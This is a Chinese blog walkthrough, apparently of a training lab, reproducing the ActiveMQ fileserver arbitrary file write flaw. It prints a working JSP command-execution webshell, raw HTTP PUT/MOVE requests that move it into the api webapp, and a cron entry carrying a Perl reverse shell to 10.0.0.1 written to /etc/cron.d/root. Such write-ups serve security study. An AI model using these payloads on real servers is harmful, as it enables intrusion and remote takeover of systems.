ActiveMQ任意文件写入漏洞

最新推荐文章于 2024-05-02 10:22:48 发布

Yolo山药

最新推荐文章于 2024-05-02 10:22:48 发布

阅读量401

点赞数

分类专栏：文件包含文章标签： java-activemq activemq java

本文链接：https://blog.csdn.net/weixin_47493074/article/details/127019492

版权

文件包含专栏收录该内容

10 篇文章 0 订阅

订阅专栏

1、漏洞描述

ActiveMQ Web控制台分为三个应用程序，admin，api和fileserver，其中admin是管理员页面，api是界面，fileserver是存储文件的界面;管理员和 API 需要先登录才能使用，文件服务器不需要登录。

fileserver 是一个 RESTful API 接口。我们可以通过HTTP请求（如GET，PUT和DELETE）读取和写入存储在其中的文件。设计目的是补偿消息队列操作无法传输和存储二进制文件的缺陷，但后来发现：

（1）其使用率不高

（2）文件操作容易出现漏洞

因此，ActiveMQ默认在5.12.x—5.13.x中关闭了文件服务器应用程序（您可以在conf/jetty.xml中打开它）；在 5.14.0 之后，文件服务器应用程序将被完全删除。在测试过程中，要注意ActiveMQ的版本，防止无用的费力。

2.漏洞详情

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。

3.文件写入有几种利用方法：

1.写入webshell
2.写入cron或ssh key等文件

靶场用了墨者学院的

在这里插入图片描述

4.漏洞复现

访问fileserver路径

在这里插入图片描述

利用burp进行抓包

在这里插入图片描述

发送到重发器上，PUT方法上传一个jsp的webshell到fileserver目录，下图可以看到成功上传jsp文件。

在这里插入图片描述

出现状态码204即为上传成功

jsp文件内容

<%@ page import="java.io.*"%>
 
<%
 
 out.print("Hello</br>");
 
 String strcmd=request.getParameter("cmd");
 
 String line=null;
 
 Process p=Runtime.getRuntime().exec(strcmd);
 
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 
 
 
 while((line=br.readLine())!=null){
 
  out.print(line+"</br>");
 
 }
 
%>

通过浏览器访问发现并没有成功解析，说明fileserver目录下没有执行权限
在这里插入图片描述

ActiveMQ默认账号密码均为admin，查看ActiveMQ的绝对路径http://your-ip:8161/admin/test/systemProperties.jsp

在这里插入图片描述

通过move的方法，将webshell移动到api或admin（写入webshell，需要写在admin或api应用中，俩应用都需要登录才能访问。）

在这里插入图片描述

移动到web目录下的api文件夹（/opt/activemq/webapps/api/1.jsp）中：

MOVE /fileserver/xxx.jsp HTTP/1.1
Destination: file:///opt/activemq/webapps/api/xxx.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

命令执行成功
在这里插入图片描述

5.写入crontab，自动化弹shell

这是一个比较稳健的方法。首先上传cron配置文件，上面重复步骤

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

将其移动到/etc/cron.d/root：

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0